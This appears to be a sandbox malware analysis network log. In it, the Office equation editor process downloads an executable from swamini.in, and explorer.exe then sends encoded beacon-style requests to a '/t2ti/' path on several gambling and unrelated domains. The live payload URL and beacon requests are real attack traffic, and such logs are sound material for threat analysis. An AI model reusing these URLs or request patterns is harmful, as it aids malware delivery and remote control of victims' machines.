                                        Nov 21, 2023 13:25:58.709410906 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.709418058 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.709492922 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.709537029 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.709548950 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.709552050 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.709587097 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.709610939 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.709753036 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.709799051 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.709809065 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.709813118 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.709852934 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.709999084 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.075880051 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.075891018 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.075927973 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.075995922 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.075995922 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.076014042 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.076061964 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.076062918 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.077976942 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078015089 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078057051 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078057051 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078068972 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078080893 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078104019 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078135967 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078175068 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078197956 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078202963 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078221083 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078243017 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078305960 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078370094 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078413963 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078432083 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078435898 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078459024 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078474998 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078561068 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078603029 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078617096 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078620911 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078653097 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078717947 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078762054 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078772068 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078774929 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.078810930 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078823090 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078975916 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.078989983 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079026937 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079040051 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079044104 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079058886 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079078913 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079140902 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079176903 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079189062 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079191923 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079226971 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079284906 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079322100 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079329967 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079334021 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079371929 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079384089 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079555988 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079592943 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079603910 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079608917 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079637051 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079648018 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079654932 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079658985 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079689980 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079696894 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079699993 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079727888 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:59.079735994 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079767942 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.079942942 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.081475973 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:59.081491947 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:26:00.464354992 CET | 49161 | 80 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:26:55.294487953 CET | 49165 | 80 | 192.168.2.22 | 107.164.111.101
                                        Nov 21, 2023 13:26:55.450167894 CET | 80 | 49165 | 107.164.111.101 | 192.168.2.22
                                        Nov 21, 2023 13:26:55.450436115 CET | 49165 | 80 | 192.168.2.22 | 107.164.111.101
                                        Nov 21, 2023 13:26:55.450467110 CET | 49165 | 80 | 192.168.2.22 | 107.164.111.101
                                        Nov 21, 2023 13:26:55.606137037 CET | 80 | 49165 | 107.164.111.101 | 192.168.2.22
                                        Nov 21, 2023 13:26:56.648093939 CET | 80 | 49165 | 107.164.111.101 | 192.168.2.22
                                        Nov 21, 2023 13:26:56.648200989 CET | 80 | 49165 | 107.164.111.101 | 192.168.2.22
                                        Nov 21, 2023 13:26:56.648214102 CET | 80 | 49165 | 107.164.111.101 | 192.168.2.22
                                        Nov 21, 2023 13:26:56.648225069 CET | 80 | 49165 | 107.164.111.101 | 192.168.2.22
                                        Nov 21, 2023 13:26:56.648513079 CET | 49165 | 80 | 192.168.2.22 | 107.164.111.101
                                        Nov 21, 2023 13:26:56.648513079 CET | 49165 | 80 | 192.168.2.22 | 107.164.111.101
                                        Nov 21, 2023 13:27:15.168286085 CET | 49166 | 80 | 192.168.2.22 | 3.33.130.190
                                        Nov 21, 2023 13:27:15.263226032 CET | 80 | 49166 | 3.33.130.190 | 192.168.2.22
                                        Nov 21, 2023 13:27:15.263430119 CET | 49166 | 80 | 192.168.2.22 | 3.33.130.190
                                        Nov 21, 2023 13:27:15.263664007 CET | 49166 | 80 | 192.168.2.22 | 3.33.130.190
                                        Nov 21, 2023 13:27:15.358530045 CET | 80 | 49166 | 3.33.130.190 | 192.168.2.22
                                        Nov 21, 2023 13:27:15.362652063 CET | 80 | 49166 | 3.33.130.190 | 192.168.2.22
                                        Nov 21, 2023 13:27:15.362664938 CET | 80 | 49166 | 3.33.130.190 | 192.168.2.22
                                        Nov 21, 2023 13:27:15.362915993 CET | 49166 | 80 | 192.168.2.22 | 3.33.130.190
                                        Nov 21, 2023 13:27:15.362915993 CET | 49166 | 80 | 192.168.2.22 | 3.33.130.190
                                        Nov 21, 2023 13:27:15.375228882 CET | 80 | 49166 | 3.33.130.190 | 192.168.2.22
                                        Nov 21, 2023 13:27:15.375420094 CET | 49166 | 80 | 192.168.2.22 | 3.33.130.190
                                        Nov 21, 2023 13:27:15.457813025 CET | 80 | 49166 | 3.33.130.190 | 192.168.2.22
                                        Nov 21, 2023 13:27:35.330826998 CET | 49167 | 80 | 192.168.2.22 | 103.150.181.71
                                        Nov 21, 2023 13:27:36.954817057 CET8049167103.150.181.71192.168.2.22
                                        Nov 21, 2023 13:27:36.955003023 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:27:36.955003023 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:27:41.824326038 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:27:51.543101072 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:28:10.996438980 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:28:30.511953115 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:28:49.980819941 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:29:28.871623993 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:30:06.245902061 CET4916780192.168.2.22103.150.181.71
                                        Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                        Nov 21, 2023 13:25:54.656249046 CET    52917    53    192.168.2.22    8.8.8.8
                                        Nov 21, 2023 13:25:54.755660057 CET    53    52917    8.8.8.8    192.168.2.22
                                        Nov 21, 2023 13:26:35.336592913 CET    54821    53    192.168.2.22    8.8.8.8
                                        Nov 21, 2023 13:26:35.444792032 CET    53    54821    8.8.8.8    192.168.2.22
                                        Nov 21, 2023 13:26:55.181051016 CET    54719    53    192.168.2.22    8.8.8.8
                                        Nov 21, 2023 13:26:55.291516066 CET    53    54719    8.8.8.8    192.168.2.22
                                        Nov 21, 2023 13:27:15.067967892 CET    49881    53    192.168.2.22    8.8.8.8
                                        Nov 21, 2023 13:27:15.167404890 CET    53    49881    8.8.8.8    192.168.2.22
                                        Nov 21, 2023 13:27:35.102672100 CET    54998    53    192.168.2.22    8.8.8.8
                                        Nov 21, 2023 13:27:35.330076933 CET    53    54998    8.8.8.8    192.168.2.22
                                        Timestamp    Source IP    Dest IP    Trans ID    OP Code    Name    Type    Class    DNS over HTTPS
                                        Nov 21, 2023 13:25:54.656249046 CET    192.168.2.22    8.8.8.8    0x73d6    Standard query (0)    swamini.in    A (IP address)    IN (0x0001)    false
                                        Nov 21, 2023 13:26:35.336592913 CET    192.168.2.22    8.8.8.8    0x622a    Standard query (0)    www.allamericanshuttlellc.com    A (IP address)    IN (0x0001)    false
                                        Nov 21, 2023 13:26:55.181051016 CET    192.168.2.22    8.8.8.8    0xa59f    Standard query (0)    www.shucaimh.com    A (IP address)    IN (0x0001)    false
                                        Nov 21, 2023 13:27:15.067967892 CET    192.168.2.22    8.8.8.8    0x575c    Standard query (0)    www.6061k.vip    A (IP address)    IN (0x0001)    false
                                        Nov 21, 2023 13:27:35.102672100 CET    192.168.2.22    8.8.8.8    0xebec    Standard query (0)    www.xazeyu.net    A (IP address)    IN (0x0001)    false
                                        Timestamp    Source IP    Dest IP    Trans ID    Reply Code    Name    CName    Address    Type    Class    DNS over HTTPS
                                        Nov 21, 2023 13:25:54.755660057 CET    8.8.8.8    192.168.2.22    0x73d6    No error (0)    swamini.in    -    103.224.247.210    A (IP address)    IN (0x0001)    false
                                        Nov 21, 2023 13:26:35.444792032 CET    8.8.8.8    192.168.2.22    0x622a    Name error (3)    www.allamericanshuttlellc.com    none    none    A (IP address)    IN (0x0001)    false
                                        Nov 21, 2023 13:26:55.291516066 CET    8.8.8.8    192.168.2.22    0xa59f    No error (0)    www.shucaimh.com    -    107.164.111.101    A (IP address)    IN (0x0001)    false
                                        Nov 21, 2023 13:27:15.167404890 CET    8.8.8.8    192.168.2.22    0x575c    No error (0)    www.6061k.vip    6061k.vip    -    CNAME (Canonical name)    IN (0x0001)    false
                                        Nov 21, 2023 13:27:15.167404890 CET    8.8.8.8    192.168.2.22    0x575c    No error (0)    6061k.vip    -    3.33.130.190    A (IP address)    IN (0x0001)    false
                                        Nov 21, 2023 13:27:15.167404890 CET    8.8.8.8    192.168.2.22    0x575c    No error (0)    6061k.vip    -    15.197.148.33    A (IP address)    IN (0x0001)    false
                                        Nov 21, 2023 13:27:35.330076933 CET    8.8.8.8    192.168.2.22    0xebec    No error (0)    www.xazeyu.net    -    103.150.181.71    A (IP address)    IN (0x0001)    false
                                        • swamini.in
                                        • www.shucaimh.com
                                        • www.6061k.vip
                                        • www.xazeyu.net
                                        Session ID: 0    Source: 192.168.2.22:49161    Destination: 103.224.247.210:80    PID: 1668    Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Timestamp    kBytes transferred    Direction    Data
                                        Nov 21, 2023 13:25:55.147417068 CET    0    OUT    GET /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: swamini.in
                                        Connection: Keep-Alive
                                        Nov 21, 2023 13:25:55.514156103 CET    1    IN    HTTP/1.1 301 Moved Permanently
                                        Content-Type: text/html; charset=UTF-8
                                        Location: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
                                        Server: Microsoft-IIS/8.5
                                        X-Powered-By: ASP.NET
                                        X-Powered-By-Plesk: PleskWin
                                        Strict-Transport-Security: max-age=15768000; includeSubDomains
                                        Date: Tue, 21 Nov 2023 12:25:52 GMT
                                        Content-Length: 194
                                        Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 73 77 61 6d 69 6e 69 2e 69 6e 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 77 70 72 2d 61 64 64 6f 6e 73 2f 66 6f 72 6d 73 2f 62 61 6c 6f 6b 61 72 61 74 32 2e 31 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                        Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe">here</a></body>


                                        Session ID: 1    Source: 192.168.2.22:49165    Destination: 107.164.111.101:80    PID: 1244    Process: C:\Windows\explorer.exe
                                        Timestamp    kBytes transferred    Direction    Data
                                        Nov 21, 2023 13:26:55.450467110 CET    359    OUT    GET /t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMf HTTP/1.1
                                        Host: www.shucaimh.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:26:56.648093939 CET    361    IN    HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 21 Nov 2023 12:26:56 GMT
                                        Content-Type: text/html;charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        X-Powered-By: PHP/5.4.41
                                        Data Raw: 62 64 65 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 e6 be b3 e9 97 a8 e5 a4 aa e9 98 b3 e9 9b 86 e5 9b a2 e5 9f 8e 39 37 32 38 7c 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e6 be b3 e9 97 a8 e5 a4 aa e9 98 b3 e9 9b 86 e5 9b a2 e5 9f 8e 39 37 32 38 28 77 77 77 2e 73 68 75 63 61 69 6d 68 2e 63 6f 6d 29 e6 98 af e6 9c 80 e7 83 ad e9 97 a8 e7 9a 84 e5 a8 b1 e4 b9 90 e5 9c ba e6 89 80 e4 b9 8b e4 b8 80 2c e7 a7 89 e6 89 bf e4 bf 9d e8 af 81 e4 b8 80 e6 b5 81 e8 b4 a8 e9 87 8f 2c e4 bf 9d e6 8c 81 e4 b8 80 e7 ba a7 e4 bf a1 e8 aa 89 e7 9a 84 e7 bb 8f e8 90 a5 e7 90 86 e5 bf b5 2c e5 9d 9a e6 8c 81 e5 ae a2 e6 88 b7 e7 ac ac e4 b8 80 e7 9a 84 e5 8e 9f e5 88 99 e4 b8 ba e5 b9 bf e5 a4 a7 e5 ae a2 e6 88 b7 e6 8f 90 e4 be 9b e4 bc 98 e8 b4 a8 e7 9a 84 e6 9c 8d e5 8a a1 e3 80 82 22 3e 0d 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e e6 be b3 e9 97 a8 e5 a4 aa e9 98 b3 e9 9b 86 e5 9b a2 e5 9f 8e 39 37 32 38 7c e9 a6 96 e9 a1 b5 28 e6 ac a2 e8 bf 8e e6 82 a8 29 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 
6e 6b 20 68 72 65 66 3d 22 2f 5f 63 73 73 2f 65 72 72 6f 72 2f 65 72 72 6f 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 5f 6a 73 2f 74 68 65 6d 65 73 2f 64 65 66 61 75 6c 74 2f 65 61 73 79 75 69 2e 63 73 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 5f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 5f 6a 73 2f 74 68 65 6d 65 73 2f 69 63 6f 6e 2e 63 73 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 5f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 79 75 69 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 5f 6a 73 2f 65 61 73 79 75 69 2d 6c 61 6e 67 2d 7a 68 5f 43 4e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a
                                        Data Ascii: bde<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><meta name="keywords" content="澳门太阳集团城9728|"><meta name="description" content="澳门太阳集团城9728(www.shucaimh.com)是最热门的娱乐场所之一,秉承保证一流质量,保持一级信誉的经营理念,坚持客户第一的原则为广大客户提供优质的服务。"><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>澳门太阳集团城9728|首页(欢迎您)</title><script src="/jquery.min.js" ></script><link href="/_css/error/error.css" rel="stylesheet" type="text/css" /><link rel="stylesheet" type="text/css" href="/_js/themes/default/easyui.css" /><script type="text/javascript" src="/_js/jquery.min.js"></script><link rel="stylesheet" type="text/css" href="/_js/themes/icon.css" /><script type="text/javascript" src="/_js/jquery.easyui.min.js"></script><script type="text/javascript" src="/_js/easyui-lang-zh_CN.js"></script>
                                        (The UTF-8 text dropped from the ASCII rendering is restored from the hex above. In English the keywords, description and title read: "Macau Sun Group City 9728|"; "Macau Sun Group City 9728 (www.shucaimh.com) is one of the most popular entertainment venues; upholding the business philosophy of guaranteeing first-class quality and maintaining a first-rate reputation, it adheres to the customer-first principle to provide quality service to its customers."; "Macau Sun Group City 9728 | Home (Welcome)". The 200 OK body is a generic casino-site landing page.)
                                        Nov 21, 2023 13:26:56.648200989 CET    362    IN    Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 5f 6a 73 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a
                                        Data Ascii: <script type="text/javascript" src="/_js/common.js"></script><script type="text/javascript" src="/_js/jquery.base64.js"></script></head><body><h1><a href="/" title='9728|()'>9728|
                                        Nov 21, 2023 13:26:56.648214102 CET363INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 74 6f 70 2e 63 6c 6f 73 65 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20
                                        Data Ascii: window.top.close(); } </script> </div><div style="clear:both;padding:10px;text-align:center;margin:5"><a href="/shucaimh.com.xml" target="_blank">XML </a> | <a href="/shu
                                        Nov 21, 2023 13:26:56.648225069 CET    363    IN    Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID: 2    Source: 192.168.2.22:49166    Destination: 3.33.130.190:80    PID: 1244    Process: C:\Windows\explorer.exe
                                        Timestamp    kBytes transferred    Direction    Data
                                        Nov 21, 2023 13:27:15.263664007 CET    364    OUT    GET /t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g== HTTP/1.1
                                        Host: www.6061k.vip
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:27:15.362652063 CET    364    IN    HTTP/1.1 403 Forbidden
                                        Server: openresty
                                        Date: Tue, 21 Nov 2023 12:27:15 GMT
                                        Content-Type: text/html
                                        Content-Length: 291
                                        Connection: close
                                        ETag: "6552b2aa-123"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
